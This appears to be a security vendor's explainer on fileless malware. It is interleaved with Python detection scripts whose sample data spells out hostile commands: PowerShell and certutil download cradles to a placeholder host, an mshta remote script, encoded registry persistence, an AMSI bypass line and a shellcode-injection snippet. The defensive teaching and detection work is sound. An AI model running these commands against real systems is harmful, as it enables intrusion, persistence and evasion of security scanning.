
Understanding Fileless Malware

LastPass, September 04, 2024

It all started with a dropper that nobody noticed. In February 2022, attackers were found staging a “fileless” malware campaign by storing their shellcode inside Windows event logs.

It was the first time researchers had seen event logs (a defensive record kept for incident analysis) used as a hiding place for a payload.

The dropper “carried” two late-stage Trojans with remote-control and lateral-movement capabilities. The Trojans themselves were not strictly fileless, but they were launched from shellcode read back out of the event log, which is a fileless technique.

Today, new variations of fileless malware continue to evade detection, which raises the question: is there a way to stop them?

Below, we explain what fileless malware is and how you can protect your business from it. 

What is Fileless Malware? 

Definition of fileless malware 

“What’s fileless malware?” and “What’s the difference between fileless and traditional file-based malware?” are two questions we’re often asked on this topic.  

First, fileless malware is often called memory-resident malware. It is malicious software that lives in RAM rather than as an executable on disk: instead of dropping a new .exe the way traditional file-based malware does, it runs inside legitimate processes and script interpreters. “Fileless” is a spectrum rather than an absolute. Many campaigns still touch non-file storage such as the registry or the WMI repository to survive a reboot; what they avoid is writing a new executable that a file scanner can inspect.

Because there is no new file to scan, fileless malware slips past traditional file-based antivirus, which is what makes it so dangerous.

Fileless malware also runs inside legitimate script interpreters such as PowerShell, Windows Script Host (VBScript/JScript), or Python.

Fileless malware versus traditional malware 

So, how common is fileless malware? 

It’s becoming increasingly common, if the numbers are any indication. 

Fileless malware attacks are 10 times more likely to succeed than traditional file-based malware attacks. In addition, fileless attacks increased 1,400% in 2022. 

According to ReliaQuest (creator of the GreyMatter open XDR platform), 86.2% of the critical customer incidents it responded to in 2023 involved fileless malware. 

And many of them used LOTL (Living Off the Land) techniques to advance the attack.

Which brings us to another important question, “What are fileless malware attacks and Living Off the Land?” 

As mentioned, fileless malware executes from memory or through trusted script interpreters. It leaves few artifacts on disk, which is why it belongs to the category of low-observable-characteristic (LOC) attacks.

Many of the fileless intrusions ReliaQuest intercepted used LOTL techniques, abusing legitimate Windows utilities such as rundll32, cmd.exe, msiexec, WMIC.exe, and certutil.exe. These utilities are also called LOLBins – and no, they aren’t trash cans with laughing faces.

Instead, LOLBins are built-in Windows utilities used for system administration or maintenance. Most are Microsoft-signed, so attackers abuse them to blend their actions in with legitimate administrative activity and to avoid bringing their own, more easily detected, tools.

Characteristics and behaviors of fileless malware 

So, where is fileless malware stored and how does it evade detection? 

Fileless malware can persist in the Windows registry and rely on script interpreters to execute its payload. Attackers favor these built-in interpreters and LOLBins because they can carry out complex operations (downloading, decoding, injecting, scheduling) without writing a new executable to disk.

Fileless malware generally enters a system through phishing emails or malicious attachments (more on this later).  

Once inside, it can move laterally, exfiltrate data, escalate privileges, and perform other covert actions without anyone being the wiser. Three LOLBins were involved in 92% of the fileless malware attacks ReliaQuest detected in 2023: rundll32 (59%), msiexec (29%), and mshta (4%).
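As an added illustration (this code is not from the LastPass article or from any vendor product), here is how a detection engineer might triage process-creation telemetry for the LOLBins named above. The events, process IDs, paths and the example.invalid URLs are constructed; the rules are heuristics an analyst would tune per environment; and the -EncodedCommand decoding shows why a base64 blob on a PowerShell command line should be unwrapped before judging it:

```python
"""Triage process-creation telemetry for LOLBin abuse.

Constructed example: the events below imitate the fields of Sysmon Event ID 1
(ProcessId, ParentImage, Image, CommandLine); none of them come from a real
host. The rules encode the LOLBins named in the article (rundll32, msiexec,
mshta, certutil, WMIC) plus regsvr32 and PowerShell, and they are heuristics
for triage, not proof of compromise.
"""
import base64
import re

# Interpreters and LOLBins that an Office application should never spawn.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "certutil.exe",
                "cmd.exe", "msiexec.exe", "wmic.exe"}
OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}

# (rule name, image basenames, case-insensitive command-line pattern)
LOLBIN_RULES = [
    ("rundll32 running inline script or a DLL from a user-writable path",
     ("rundll32.exe",), r"javascript:|vbscript:|\\users\\|\\temp\\|\\programdata\\"),
    ("mshta running remote or inline script", ("mshta.exe",),
     r"https?://|javascript:|vbscript:"),
    ("msiexec installing a package from a URL", ("msiexec.exe",), r"https?://"),
    ("certutil used as a downloader or decoder", ("certutil.exe",),
     r"-urlcache|-decode|-encode|-verifyctl"),
    ("regsvr32 loading a remote scriptlet", ("regsvr32.exe",),
     r"/i:https?://|scrobj\.dll"),
    ("wmic remote execution or XSL script", ("wmic.exe",),
     r"process\s+call\s+create|/node:|/format:"),
    ("powershell hidden, encoded or downloading", ("powershell.exe", "pwsh.exe"),
     r"-(e|ec|enc|encodedcommand)\s|-nop\b|hidden|invoke-expression|\biex\b"
     r"|downloadstring|frombase64string"),
]

ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
STAGE_TWO = re.compile(r"invoke-expression|\biex\b|downloadstring|downloadfile"
                       r"|frombase64string|reflection\.assembly", re.I)


def encode_powershell(text: str) -> str:
    """Build the -EncodedCommand form PowerShell expects (base64 of UTF-16LE)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(cmdline: str):
    """Return the script hidden behind -EncodedCommand, or None if absent/invalid."""
    m = ENCODED_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(events):
    """Return one finding per event that trips at least one heuristic."""
    findings = []
    for ev in events:
        image = ev["Image"].rsplit("\\", 1)[-1].lower()
        parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
        cmd = ev["CommandLine"]
        hits = []
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            hits.append(f"{parent} spawned {image}")
        for name, images, pattern in LOLBIN_RULES:
            if image in images and re.search(pattern, cmd, re.I):
                hits.append(name)
        decoded = decode_encoded_command(cmd) if image in ("powershell.exe", "pwsh.exe") else None
        if decoded and STAGE_TWO.search(decoded):
            hits.append("decoded -EncodedCommand contains download/execute primitives")
        if hits:
            findings.append({"pid": ev["ProcessId"], "image": image,
                             "hits": hits, "decoded": decoded})
    return findings


# Constructed sample events (PIDs, paths and URLs are invented).
_STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/a.ps1')"
SAMPLE_EVENTS = [
    {"ProcessId": 4100, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\rundll32.exe",
     "CommandLine": r"rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL"},
    {"ProcessId": 4212, "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + encode_powershell(_STAGER)},
    {"ProcessId": 4390, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "mshta.exe http://example.invalid/x.hta"},
    {"ProcessId": 4401, "ParentImage": r"C:\Windows\System32\cmd.exe",
     "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://example.invalid/p.ps1 C:\Users\Public\p.ps1"},
    {"ProcessId": 4455, "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\msiexec.exe",
     "CommandLine": r"msiexec.exe /i C:\Users\bob\Downloads\setup.msi /qn"},
]

if __name__ == "__main__":
    for f in triage(SAMPLE_EVENTS):
        print(f["pid"], f["image"], "; ".join(f["hits"]))
        if f["decoded"]:
            print("    decoded:", f["decoded"])
```

Run it as a script to print the three hits. The benign rundll32 and msiexec events stay quiet because the rules key on how the binary is used (a URL, an inline script, a user-writable path), not on the binary name alone; that distinction is what separates a useful LOLBin detection from an alert flood.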

Examples of fileless malware 

Examples of fileless malware include: 

  • Code Red, one of the first fileless worms. It lived only in the memory of vulnerable IIS servers and infected roughly 350,000 hosts in 2001. 
  • PyLoose, a Python script loaded directly into memory on cloud workloads to run a cryptocurrency miner 
  • DarkWatchman, which targeted individuals in the finance, transport, energy, and software security industries in Estonia, Latvia, Kazakhstan, and Russia 
  • Poweliks, which stores JavaScript and PowerShell in the registry and runs it without ever writing an executable to disk 
  • Kovter, an extremely persistent variant that keeps its payload in the registry and launches it through mshta.exe 
  • Panda Stealer, a cryptocurrency-stealing infostealer that spreads via Discord 

How Does Fileless Malware Work? Common Techniques 

Script-based techniques employed by fileless malware 

Fileless malware often uses scripting languages like PowerShell, VBScript, and JavaScript to execute malicious code. 

PowerShell is a favorite vehicle because it is trusted, signed, present on every Windows machine, and able to load code into memory directly. 

Attackers may embed PowerShell commands in email attachments, for example inside an Office macro or a shortcut (.lnk) file. When the attachment is opened, the macro launches PowerShell, which pulls the next stage over the network and runs it from memory without ever saving it to disk. 

Memory-based attacks and fileless persistence methods 

Memory-based attacks execute directly from RAM. They place malicious code in the memory space of a legitimate process, either by exploiting a vulnerability in an exposed application or by using ordinary process-manipulation APIs that the operating system provides for debugging and administration.  

For example, reflective DLL injection places a DLL into the memory of a target process and maps it with a loader stub of its own instead of calling LoadLibrary. Because the DLL is never read from disk and never registered with the Windows loader, it does not appear in the process’s module list, which lets this type of fileless attack evade detections that only look at files and loaded modules. 
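Detection-side illustration, added here and not part of the original article: the scanner logic below reproduces the core checks a memory-forensics plugin such as Volatility’s malfind applies when hunting for reflectively loaded code. The region table, module list, addresses and byte heads are constructed to resemble a VirtualQueryEx walk of one process; nothing was captured from a real system.

```python
"""Flag memory regions that look like injected code, the way a memory-forensics
plugin such as Volatility's malfind does.

Added example: the region table and module list below are constructed to look
like the output of VirtualQueryEx over a process, not captured from a real
system. Field meanings: protect is the Win32 PAGE_* constant, type is the
MEM_* allocation type, path is the backing file for MEM_IMAGE regions, and
head is the first bytes at the region base.
"""

PAGE_EXECUTE, PAGE_EXECUTE_READ = 0x10, 0x20
PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x40, 0x80
EXECUTABLE = {PAGE_EXECUTE, PAGE_EXECUTE_READ, PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY}


def scan_regions(regions, loaded_modules):
    """Return findings for executable regions with no legitimate file behind them.

    loaded_modules is the set of DLL/EXE paths the Windows loader knows about
    (what the PEB module lists would show); a reflectively loaded DLL is absent
    from it because it never went through LoadLibrary.
    """
    known = {p.lower() for p in loaded_modules}
    findings = []
    for r in regions:
        prot = r["protect"] & 0xFF          # drop PAGE_GUARD / PAGE_NOCACHE modifier bits
        if prot not in EXECUTABLE:
            continue
        has_pe_header = r["head"].startswith(b"MZ")
        if r["type"] == "MEM_IMAGE":
            # File-backed code is normal; code mapped from a file the loader
            # never registered is not (manual mapping, module unlinking).
            if r["path"].lower() not in known:
                findings.append(_finding(r, "high", "image-backed code not in loader module list"))
            continue
        # MEM_PRIVATE / MEM_MAPPED executable memory has no file on disk behind it.
        if has_pe_header:
            findings.append(_finding(r, "high", "PE header in private executable memory (reflective DLL)"))
        elif prot == PAGE_EXECUTE_READWRITE:
            findings.append(_finding(r, "medium", "private RWX region without PE header (shellcode or JIT)"))
        else:
            findings.append(_finding(r, "low", "private executable region; compare against a JIT allowlist"))
    return findings


def _finding(region, severity, reason):
    return {"base": region["base"], "size": region["size"],
            "severity": severity, "reason": reason}


# Constructed sample: one process with three planted anomalies and one JIT-like region.
LOADED_MODULES = {
    r"C:\Program Files\App\app.exe",
    r"C:\Windows\System32\ntdll.dll",
    r"C:\Windows\System32\kernel32.dll",
}
SAMPLE_REGIONS = [
    {"base": 0x7FF7_0000_0000, "size": 0x80000, "protect": PAGE_EXECUTE_READ,
     "type": "MEM_IMAGE", "path": r"C:\Program Files\App\app.exe", "head": b"MZ\x90\x00"},
    {"base": 0x7FF8_0000_0000, "size": 0x1F0000, "protect": PAGE_EXECUTE_READ,
     "type": "MEM_IMAGE", "path": r"C:\Windows\System32\ntdll.dll", "head": b"MZ\x90\x00"},
    {"base": 0x1A0000, "size": 0x10000, "protect": 0x04,                      # PAGE_READWRITE heap
     "type": "MEM_PRIVATE", "path": "", "head": b"\x00" * 4},
    {"base": 0x2B0000, "size": 0x40000, "protect": PAGE_EXECUTE_READWRITE,    # reflective DLL
     "type": "MEM_PRIVATE", "path": "", "head": b"MZ\x90\x00"},
    {"base": 0x3C0000, "size": 0x1000, "protect": PAGE_EXECUTE_READWRITE,     # raw shellcode
     "type": "MEM_PRIVATE", "path": "", "head": b"\xfc\x48\x83\xe4"},
    {"base": 0x7FF6_0000_0000, "size": 0x30000, "protect": PAGE_EXECUTE_READ,  # manually mapped DLL
     "type": "MEM_IMAGE", "path": r"C:\Users\Public\helper.dll", "head": b"MZ\x90\x00"},
    {"base": 0x4D0000, "size": 0x8000, "protect": PAGE_EXECUTE_READ,          # JIT-style RX memory
     "type": "MEM_PRIVATE", "path": "", "head": b"\x48\x89\x5c\x24"},
]

if __name__ == "__main__":
    for f in scan_regions(SAMPLE_REGIONS, LOADED_MODULES):
        print(f"{f['base']:#014x} {f['severity']:6} {f['reason']}")
```

JIT engines (the .NET runtime, browsers) also allocate private executable memory, so the low- and medium-severity findings need an allowlist. The two high-severity cases, a PE header sitting in private memory and image-backed code the loader never registered, are the ones that match reflective DLL injection and manual mapping, and they are what Volatility’s malfind and ldrmodules plugins surface from a memory capture.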

Fileless malware leveraging legitimate system tools 

Attackers often store code in registry values and launch it through a legitimate process, for example an autorun entry that invokes a script interpreter to read the payload back out of the registry.  

For example, the DarkWatchman malware is a RAT (Remote Access Trojan) that uses the Windows registry to execute fileless payloads. This JavaScript RAT has keylogging capabilities; it can capture keystrokes, system information, and clipboard data. 

When an unsuspecting user clicks on what they think is a legitimate link in their email, they are sent to a phishing website. Once there, they are prompted to download a file called “CSPSetup.rar.” 

Upon extraction, two files are available. The first, CSPSetup.exe, installs DarkWatchman when executed. The second is a Russian-language readme.txt, which implies that the main targets are Russian speakers. 

Impacts of Fileless Malware on Organizations 

Financial and reputational risks associated with fileless attacks 

The financial and reputational damage from a fileless malware attack can be devastating. 

A significant portion of consumers will immediately lose trust in a brand after such an attack: 

  • 66% of consumers won’t trust a business that falls victim to a data breach 
  • 44% of consumers think it’s the company’s fault when an attack happens 

Meanwhile, 57% of consumers would stop spending money with their favorite brand if it experienced an attack, and a whopping 70% think it’s the company’s responsibility to protect them from phishing campaigns. 

Any loss of trust can lead to decreased sales and market share, on top of the direct costs of incident response, system recovery, and ransom demands. According to IBM’s 2024 report, the global average cost of a data breach is $4.88 million. 

Finally, regulatory fines and legal fees may be severe enough to precipitate bankruptcy proceedings. 

Industries and sectors targeted by fileless malware 

Certain industries and sectors are particularly attractive to attackers who perpetrate fileless malware attacks. They include: 

  • Retail. The Prilex malware targets POS (Point-of-Sale) systems and ATMs; its newer versions block NFC (Near Field Communication) contactless payments so the shopper falls back to inserting the card, which lets the malware capture the chip transaction. 
  • Government & Education. These two sectors are prime targets because of the critical and sensitive nature of their work. Fileless attacks that deploy ransomware are growing, and colleges and government agencies pay some of the highest amounts ($6.6 million at last count). 
  • Healthcare. This industry is another favorite target, due to the PII (personally identifiable information) and medical data it holds. According to the HIPAA Journal, healthcare data breaches increased 8.4% from Q1 2023 to Q1 2024. The recent Change Healthcare breach will cost its parent company UnitedHealth between $2.3 billion (about $7 per person in the US) and $2.45 billion (about $8 per person in the US) in 2024.  
  • Financial services. Attackers continue to focus on this industry, due to the potential for direct financial gain. Fileless attacks that deploy banking trojans have stolen millions from financial institutions since 2011. 

Importance of cybersecurity awareness and employee training 

Given the sophisticated nature of fileless malware attacks, cybersecurity awareness and employee training are more important than ever. Businesses should prioritize: 

  • Simulated training in the form of mock phishing campaigns to help identify gaps in employee awareness 
  • Updated security policies regarding access controls and data handling procedures 

Stages of a Fileless Attack 

Initial infiltration and delivery methods of fileless malware 

In this section, we’ll answer two important, interconnected questions:  

  • How does fileless malware spread or propagate within a network?  
  • What are the stages of a fileless malware attack?  

One of the most popular infiltration methods is phishing emails.  

The following is an example of how a fileless attack may commence. 

First, the recipient is tricked into opening an attachment, which executes an embedded script.  

The script invokes certutil.exe, a built-in certificate utility that can also fetch files over HTTP, which downloads a PowerShell script from the attacker’s server.  

This PowerShell script writes a command to an autorun location in the victim’s registry (a Run key, for example) so that it executes again at the next logon.  

When the user fires up their laptop the next morning, the PowerShell script deploys infostealer malware to the device. 
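The chain above ends in the registry, which is where a responder would look first. The audit below is an added example, not code from the article: it parses a constructed .reg export (the text format produced by `reg export`) of the current user’s Run and RunOnce keys and flags values that launch a script interpreter or LOLBin, carry an encoded PowerShell command, embed an inline javascript: payload, or point into a user-writable directory. The registry contents, value names and the example.invalid URL are invented.

```python
"""Audit autorun registry values for fileless persistence.

Added example: parses a constructed .reg export (the format `reg export`
produces) and flags Run/RunOnce values that launch a script interpreter or
LOLBin, carry an encoded PowerShell command, use an inline javascript:/vbscript:
payload (the Poweliks/Kovter pattern), or point into a user-writable path.
The registry contents are invented; 'example.invalid' is a reserved test name.
"""
import base64
import re

INTERPRETER = re.compile(
    r"\b(powershell|pwsh|mshta|wscript|cscript|regsvr32|rundll32|cmd|msiexec|certutil)"
    r'(?:\.exe)?(?=[\s"]|$)', re.I)
INLINE_SCRIPT = re.compile(r"javascript:|vbscript:", re.I)
ENCODED_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
USER_WRITABLE = re.compile(r"\\users\\|\\appdata\\|\\temp\\|%temp%|\\programdata\\", re.I)


def _unescape(s):
    """Undo .reg escaping: doubled backslashes and backslash-quote."""
    return re.sub(r'\\(["\\])', r'\1', s)


def parse_reg(text):
    """Yield (key, value name, string) for REG_SZ and REG_EXPAND_SZ values."""
    key, pending = None, ""
    for raw in text.splitlines():
        line = pending + raw.strip()
        pending = ""
        if not line or line.startswith(";") or line.startswith("Windows Registry Editor"):
            continue
        if line.startswith("["):
            key = line.strip("[]")
            continue
        if line.endswith("\\"):          # hex values wrap across lines with a trailing backslash
            pending = line[:-1]
            continue
        name, _, value = line.partition("=")
        name = "(Default)" if name == "@" else name.strip('"')
        if value.startswith('"'):                         # REG_SZ
            yield key, name, _unescape(value[1:-1])
        elif value.lower().startswith("hex(2):"):         # REG_EXPAND_SZ as UTF-16LE bytes
            data = bytes.fromhex(value[7:].replace(",", ""))
            yield key, name, data.decode("utf-16-le").rstrip("\x00")


def audit_autoruns(reg_text):
    """Return one finding per value with at least one suspicious trait."""
    findings = []
    for key, name, command in parse_reg(reg_text):
        reasons, severity, decoded = [], None, None
        m = INTERPRETER.search(command)
        if m:
            reasons.append(f"launches {m.group(1).lower()}")
            severity = "high"
        if INLINE_SCRIPT.search(command):
            reasons.append("inline script in command (Poweliks/Kovter style)")
            severity = "high"
        enc = ENCODED_ARG.search(command)
        if enc:
            reasons.append("encoded PowerShell command")
            severity = "high"
            try:
                decoded = base64.b64decode(enc.group(1)).decode("utf-16-le")
            except (ValueError, UnicodeDecodeError):
                decoded = None
        if USER_WRITABLE.search(command):
            reasons.append("binary in user-writable path")
            severity = severity or "low"        # common for legitimate per-user installs
        if reasons:
            findings.append({"key": key, "name": name, "command": command,
                             "severity": severity, "reasons": reasons, "decoded": decoded})
    return findings


def _encode_ps(text):
    """Base64 of UTF-16LE, the form -EncodedCommand expects (used to build the sample)."""
    return base64.b64encode(text.encode("utf-16-le")).decode("ascii")


# Constructed .reg export: two legitimate entries, two planted persistence values
# and one REG_EXPAND_SZ pointing into %TEMP%.
_STAGER = "Start-Process mshta http://example.invalid/p.hta -WindowStyle Hidden"
SAMPLE_REG = rf"""Windows Registry Editor Version 5.00

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
"SecurityHealth"="C:\\Windows\\System32\\SecurityHealthSystray.exe"
"OneDrive"="\"C:\\Users\\bob\\AppData\\Local\\Microsoft\\OneDrive\\OneDrive.exe\" /background"
"WindowsUpdate"="powershell.exe -NoP -W Hidden -Enc {_encode_ps(_STAGER)}"
"hkbbu"="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication \";eval(\"payload\")"

[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce]
"Updater"=hex(2):25,00,54,00,45,00,4d,00,50,00,25,00,5c,00,\
  75,00,2e,00,65,00,78,00,65,00,00,00
"""

if __name__ == "__main__":
    for f in audit_autoruns(SAMPLE_REG):
        print(f["severity"].upper(), f["key"].rsplit("\\", 1)[-1], f["name"], "->", "; ".join(f["reasons"]))
        if f["decoded"]:
            print("    decoded:", f["decoded"])
```

The OneDrive and Updater hits are rated low on purpose: plenty of legitimate per-user software lives under AppData, so a user-writable path is a prompt to verify the file’s signature and hash, not an alert by itself. The encoded PowerShell value and the rundll32 javascript: stub are the patterns Poweliks and Kovter made famous, and they are flagged high regardless of where the launching binary lives.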

Unless the victim has the right proactive and reactive tools in place, they are likely to become another cybercrime statistic. 

Other infiltration and delivery methods include: 

  • Drive-by downloads such as exploit kits, a favorite vector for fileless attacks because the exploit’s payload runs directly in the memory of the browser process and never needs to be saved as a file 
  • Watering holes (another drive-by download variant). Recently, Chinese APT (Advanced Persistent Threat) group Daggerfly deployed a watering hole attack that compromised pro-democracy websites in Hong Kong. When visitors accessed those websites, their devices were infected with iOS and macOS exploits that deployed a backdoor for collecting audio streams, screen captures, and other sensitive data. 

Execution and exploitation techniques used in fileless attacks 

APT attacks are growing in popularity. MITRE’s ATT&CK knowledge base (maintained by the not-for-profit MITRE Corporation) currently tracks 138 APT groups, and their tactics, techniques, and procedures (TTPs) keep getting more sophisticated.  

Modern fileless attacks are multi-stage, combining scripts, memory injection, and LOTL (Living Off the Land) techniques. They also feed credential-based attacks and access-as-a-service schemes, in which initial-access brokers sell stolen credentials or footholds to other threat actors. 

In 2022, the Multi-State Information Sharing and Analysis Center predicted that fileless malware and LOTL attacks would rise by more than 50%, matching the frequency of file-based attacks for the first time. 

Potential damage caused by fileless malware 

Over 91% of ransomware attacks in recent years incorporated fileless techniques, making them more difficult to detect. 

And YOUR credentials are the prize. 

By stealing credentials, fileless malware compromises your personal and financial information, leading to significant risks of identity theft.  

How bad is it? 

In July 2024, mobile security firm Zimperium disclosed a campaign of more than 107,000 malicious Android app samples built to steal one-time passwords for 600 global brands. The victims number in the millions across 113 countries. 

Meanwhile, identity theft reports comprise 1.4 million out of the 5.7 million fraud cases the FTC has handled so far in 2024.   

Detecting and Preventing Fileless Malware 

Signs and indicators of a fileless malware infection 

By now, you may be wondering, “How can I detect fileless malware?” 

There are several key indicators to watch for:  

  • PowerShell or another script interpreter launched by a process that should not be launching it (an Office application, a PDF reader, a browser), or launched with a hidden window and an encoded command line. This is the strongest of the four signals. 
  • Frequent crashes and performance lag that occur with an unsettling regularity (a weak signal on its own). 
  • Unusually high memory use in a process that should be idle, since fileless malware resides in RAM (also weak on its own; correlate it with the process-creation signal above). 
  • Office documents containing VBA macros that spawn script interpreters, since macros remain a common delivery vehicle for fileless payloads.  
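If PowerShell Script Block Logging is enabled, every block the engine runs is recorded as Event ID 4104, which turns the first indicator above into something you can score. The scorer below is an added example (not from the article and not a product), with constructed ScriptBlockText samples and illustrative weights; it normalizes the cheap obfuscation tricks (backticks inside identifiers, string concatenation, [char] sequences) before matching, which is the same kind of unwrapping AMSI relies on:

```python
"""Score PowerShell script-block log entries (Event ID 4104) for fileless tradecraft.

Added example: the six ScriptBlockText values below are constructed, not taken
from a real log, and the weights are illustrative. Script Block Logging records
what the engine is about to run, so lightweight normalisation of common
obfuscation (backticks inside identifiers, 'a'+'b' string concatenation,
[char]N sequences) exposes the tokens AMSI and an analyst would look for.
"""
import re

# (tag, case-insensitive pattern, weight); each tag counts once per block.
INDICATORS = [
    ("invoke-expression", r"invoke-expression|\biex\b", 3),
    ("download-cradle", r"downloadstring|downloadfile|net\.webclient|invoke-webrequest|start-bitstransfer", 2),
    ("base64-decode", r"frombase64string", 2),
    ("reflective-assembly-load", r"reflection\.assembly\]::load|\[appdomain\]::currentdomain\.load", 4),
    ("win32-memory-api", r"virtualalloc|createthread|writeprocessmemory|createremotethread", 4),
    ("unmanaged-marshal", r"interopservices\.marshal", 2),
    ("amsi-tamper", r"amsiutils|amsiinitfailed|amsiscanbuffer", 5),
    ("credential-dumping", r"invoke-mimikatz|sekurlsa|lsass", 5),
]
OBFUSCATION = re.compile(r"[A-Za-z]`[A-Za-z]|['\"]\s*\+\s*['\"]|\[char\]\d+", re.I)
ALERT_THRESHOLD = 5


def normalize(script: str) -> str:
    """Undo the cheap obfuscation tricks so the indicators can match."""
    s = re.sub(r"`(?=[A-Za-z])", "", script)                        # i`e`x -> iex
    s = re.sub(r"(['\"])\s*\+\s*\1", "", s)                         # 'Am'+'si' -> 'Amsi'
    s = re.sub(r"\[char\](\d+)", lambda m: chr(int(m.group(1))), s)  # [char]105 -> i
    s = re.sub(r"(?<=[A-Za-z])\+(?=[A-Za-z])", "", s)                # i+e+x -> iex
    return s


def score_block(text: str):
    """Return (score, tags) for one ScriptBlockText."""
    tags, score = [], 0
    if OBFUSCATION.search(text):          # judged on the raw text, before normalisation
        tags.append("obfuscation")
        score += 2
    normalized = normalize(text)
    for tag, pattern, weight in INDICATORS:
        if re.search(pattern, normalized, re.I):
            tags.append(tag)
            score += weight
    return score, tags


def score_script_blocks(events):
    """Score a list of 4104-style records and attach a verdict to each."""
    out = []
    for ev in events:
        score, tags = score_block(ev["ScriptBlockText"])
        out.append({"ScriptBlockId": ev["ScriptBlockId"], "Path": ev.get("Path", ""),
                    "score": score, "tags": tags,
                    "verdict": "alert" if score >= ALERT_THRESHOLD else "clean"})
    return out


# Constructed 4104 records: one admin one-liner and five fileless patterns.
SAMPLE_4104 = [
    {"ScriptBlockId": "b1", "Path": r"C:\ops\services.ps1",
     "ScriptBlockText": "Get-Service | Where-Object { $_.Status -eq 'Stopped' } | Select-Object Name, DisplayName"},
    {"ScriptBlockId": "b2", "Path": "",
     "ScriptBlockText": r"$w = New-Object Net.WebClient; I`E`X $w.DownloadString('http://example.invalid/a.ps1')"},
    {"ScriptBlockId": "b3", "Path": "",
     "ScriptBlockText": "$b = [Convert]::FromBase64String($d); [System.Reflection.Assembly]::Load($b).EntryPoint.Invoke($null, $null)"},
    {"ScriptBlockId": "b4", "Path": "",
     "ScriptBlockText": "$k = Add-Type -MemberDefinition $sig -Name Win32 -PassThru; $p = $k::VirtualAlloc(0, $sc.Length, 0x3000, 0x40); [Runtime.InteropServices.Marshal]::Copy($sc, 0, $p, $sc.Length); $k::CreateThread(0, 0, $p, 0, 0, 0)"},
    {"ScriptBlockId": "b5", "Path": "",
     "ScriptBlockText": "[Ref].Assembly.GetType('System.Management.Automation.'+'AmsiUtils').GetField('amsiInitFailed','NonPublic,Static').SetValue($null,$true)"},
    {"ScriptBlockId": "b6", "Path": "",
     "ScriptBlockText": "& ([char]105+[char]101+[char]120) (New-Object Net.WebClient).DownloadString($u)"},
]

if __name__ == "__main__":
    for f in score_script_blocks(SAMPLE_4104):
        print(f["ScriptBlockId"], f["verdict"], f["score"], ",".join(f["tags"]))
```

A real deployment would also join blocks by ScriptBlockId (long scripts are logged in pieces), weight interactive sessions with no Path more heavily, and suppress known administrative scripts by hash. The weights are deliberately blunt; what matters is that the decision runs on normalized text, because the backtick and string-concatenation tricks in samples b2 and b5 exist precisely to keep plain string matches from firing.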

Effective detection strategies and tools for fileless attacks 

How can fileless malware be prevented? 

These five key strategies can dramatically reduce your chances of a successful fileless malware attack: 

  • Enforce Zero Trust principles like least privilege to limit lateral movement across your network. The NSA recommends privileged access management tools with strong authentication mechanisms. Monitoring privileged access is key because attackers continue to target high-level credentials with elevated permissions as a means of moving laterally through a system. 
  • If you’re running Windows 10 or newer, the Antimalware Scan Interface (AMSI) is built into the operating system: PowerShell, Windows Script Host, Office VBA and the .NET runtime hand script content to whatever antivirus is registered (Microsoft Defender Antivirus by default) at the moment it is about to execute, after any obfuscation has been unwrapped, so even a script that never touches disk gets scanned. Enable PowerShell Script Block Logging (Event ID 4104) alongside it so the same content reaches your SIEM. Microsoft Defender for Endpoint layers behavioral detections on top, including WMI event-subscription persistence and reflective DLL injection. 
  • Attackers use Mimikatz to extract passwords, PIN codes, Kerberos tickets, and other credentials from LSASS memory. Because it can be loaded straight into memory (for example through a PowerShell reflective loader), no Mimikatz file ever lands on disk for a scanner to find, and the attacker can move laterally and persist with little fear of detection. Reduce what it can harvest by enabling LSA Protection (RunAsPPL) and Credential Guard and by removing local administrator rights from everyday accounts, and pair that with endpoint detection and threat-intelligence tooling that lets you investigate any endpoint in cloud or on-prem environments. 
  • Implement application allowlisting (AppLocker or Windows Defender Application Control on Windows) in line with CISA guidance to blunt Living off the Land attacks. Allowlisting permits only authorized programs to run, creating a default-deny environment where anything not explicitly approved is blocked. Constrain the LOLBins themselves as well (for example, block mshta.exe and wscript.exe for standard users and put PowerShell into Constrained Language Mode), because an allowlist that permits every signed Microsoft binary still permits the tools attackers live off. 
  • Enforce robust identity access management controls and implement phishing-resistant MFA (multi-factor authentication) for privileged accounts – as recommended by CISA. 

According to CISA, these best practices provide the best defense against fileless malware attacks: 

  • Behavioral analytics: AI- and ML-powered behavioral analytics flag deviations from a baseline as potential Indicators of Attack (IOAs). IOAs describe attacker behavior as it happens, whereas IOCs (Indicators of Compromise) are artifacts of a past intrusion; used together they give a more robust defense against LOTL attacks.  
  • Endpoint detection and response (EDR): LOTL attacks often avoid triggering signature-driven tools because LOLBins are signed and assumed safe. To bolster EDR, consider XDR (Extended Detection & Response) tools that correlate endpoint events with identity, network and cloud telemetry across your entire technology stack.  
